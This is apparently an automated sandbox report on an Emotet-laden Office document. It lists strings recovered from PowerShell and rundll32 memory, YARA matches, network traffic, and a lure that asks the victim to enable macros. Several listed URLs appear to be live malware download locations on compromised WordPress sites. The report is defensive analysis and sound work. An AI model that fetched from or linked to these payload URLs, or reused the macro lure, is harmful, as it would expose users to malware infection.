Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2095128436.000000001CCC2000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000005.00000002.2103224125.000000001B3D4000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabg
Source: powershell.exe, 00000005.00000002.2095497751.00000000001B5000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en:
Source: powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu
Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: powershell.exe, 00000005.00000002.2103224125.000000001B3D4000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100503288.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099372618.00000000021F7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100503288.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099372618.00000000021F7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmp String found in binary or memory: http://nightlifemumbai.club
Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmp String found in binary or memory: http://nightlifemumbai.club/x/0wBD3/
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000005.00000002.2103563563.000000001CC40000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000005.00000002.2103414288.000000001B4C5000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0J
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000005.00000003.2095298060.000000001B49C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000002.2103631224.000000001CC83000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.gva.es0
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0/
Source: powershell.exe, 00000005.00000003.2095118567.000000001CC8A000.00000004.00000001.sdmp String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: powershell.exe, 00000005.00000002.2103631224.000000001CC83000.00000004.00000001.sdmp String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: powershell.exe, 00000005.00000002.2096093132.0000000002450000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100938430.0000000002970000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2104214034.000000001D220000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100503288.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099372618.00000000021F7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmp String found in binary or memory: http://traumfrauen-ukraine.de
Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmp String found in binary or memory: http://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100503288.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099372618.00000000021F7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2096093132.0000000002450000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100938430.0000000002970000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at0E
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: powershell.exe, 00000005.00000003.2095118567.000000001CC8A000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmp String found in binary or memory: http://www.certicamara.com0
Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: powershell.exe, 00000005.00000003.2095090679.000000001CC70000.00000004.00000001.sdmp String found in binary or memory: http://www.certifikat.dk/repository0
Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: powershell.exe, 00000005.00000003.2094894681.000000001CCAE000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://www.chambersign.org1
Source: powershell.exe, 00000005.00000002.2103631224.000000001CC83000.00000004.00000001.sdmp String found in binary or memory: http://www.crc.bg0
Source: powershell.exe, 00000005.00000003.2095298060.000000001B49C000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmp String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmp String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmp String found in binary or memory: http://www.disig.sk/ca0f
Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: powershell.exe, 00000005.00000003.2095118567.000000001CC8A000.00000004.00000001.sdmp String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: powershell.exe, 00000005.00000003.2095113517.000000001CC9A000.00000004.00000001.sdmp String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: powershell.exe, 00000005.00000003.2095108394.000000001CC61000.00000004.00000001.sdmp String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmp String found in binary or memory: http://www.firmaprofesional.com0
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0=
Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100503288.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099372618.00000000021F7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmp String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000003.2094871839.000000001CC82000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0%
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: powershell.exe, 00000005.00000003.2095108394.000000001CC61000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2095094346.000000001CC8D000.00000004.00000001.sdmp String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: powershell.exe, 00000005.00000003.2095090679.000000001CC70000.00000004.00000001.sdmp String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/cps/0
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: powershell.exe, 00000005.00000003.2095094346.000000001CC8D000.00000004.00000001.sdmp String found in binary or memory: http://www.ssc.lt/cps03
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: powershell.exe, 00000005.00000003.2095132892.000000001CCE3000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmp String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: powershell.exe, 00000005.00000002.2103224125.000000001B3D4000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.com/1
Source: powershell.exe, 00000005.00000003.2095108394.000000001CC61000.00000004.00000001.sdmp String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000003.2095132892.000000001CCE3000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmp String found in binary or memory: https://jflmktg.wpcomsta
Source: powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmp String found in binary or memory: https://jflmktg.wpcomstaging.com
Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmp String found in binary or memory: https://jflmktg.wpcomstaging.com/wp-content/AK/
Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmp String found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2096708382.0000000002C54000.00000004.00000001.sdmp String found in binary or memory: https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/P
Source: powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000005.00000002.2100590447.0000000003AB6000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmp String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000005.00000002.2100590447.0000000003AB6000.00000004.00000001.sdmp String found in binary or memory: https://shop.nowfal.dev
Source: powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmp String found in binary or memory: https://shop.nowfal.dev/wp-includes/RlMObf2j0/
Source: powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmp String found in binary or memory: https://traumfrauen-ukraine.de
Source: powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmp String found in binary or memory: https://traumfrauen-ukraine.de/bin/JyeS/
Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: powershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: powershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: powershell.exe, 00000005.00000002.2100590447.0000000003AB6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000005.00000003.2095090679.000000001CC70000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.hu/docs/
Source: powershell.exe, 00000005.00000002.2095523344.00000000001FF000.00000004.00000020.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 0000000A.00000002.2340471490.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103211054.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099681176.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103277620.0000000000230000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2099018804.0000000000890000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2340431791.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2098274054.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2098491144.0000000000230000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099699413.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2099787723.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2103402652.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2340448062.0000000000330000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 10.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.890000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.890000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.330000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing and Enable Content. 0 Page, I of I Words: 8,362 N@m 13 ;a 10096 G) FI G) ,,
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 0 Page, I of I Words: 8,362 N@m 13 ;a 10096 G) FI G) ,, . [:D:] ,,gS ..,
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 0 Screenshot OCR: Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Content.
Very long command line found
Source: unknown Process created: Commandline size = 5413
Source: unknown Process created: Commandline size = 5312
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5312 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Ueilekrvmxoa\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00236417 7_2_00236417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024A0F1 7_2_0024A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023A821 7_2_0023A821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00240223 7_2_00240223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024D02D 7_2_0024D02D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00248C2B 7_2_00248C2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00244C37 7_2_00244C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242631 7_2_00242631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00248A33 7_2_00248A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242C05 7_2_00242C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00231806 7_2_00231806
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00232208 7_2_00232208
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023240F 7_2_0023240F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023E612 7_2_0023E612
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00235418 7_2_00235418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00240672 7_2_00240672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023BE74 7_2_0023BE74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023327F 7_2_0023327F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024AA7B 7_2_0024AA7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00234844 7_2_00234844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023E044 7_2_0023E044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00245250 7_2_00245250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023CAA3 7_2_0023CAA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023DE81 7_2_0023DE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00241090 7_2_00241090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00244A9E 7_2_00244A9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024D4E1 7_2_0024D4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023D6F0 7_2_0023D6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023ECFE 7_2_0023ECFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023A6C9 7_2_0023A6C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023A2D2 7_2_0023A2D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024C6D9 7_2_0024C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023D2DD 7_2_0023D2DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023A525 7_2_0023A525
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00239D2F 7_2_00239D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00237731 7_2_00237731
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024CF31 7_2_0024CF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00233336 7_2_00233336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00237B39 7_2_00237B39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00233938 7_2_00233938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00244F04 7_2_00244F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00239106 7_2_00239106
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00235F04 7_2_00235F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024D70B 7_2_0024D70B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024B165 7_2_0024B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024A966 7_2_0024A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023C364 7_2_0023C364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023F369 7_2_0023F369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00233B74 7_2_00233B74
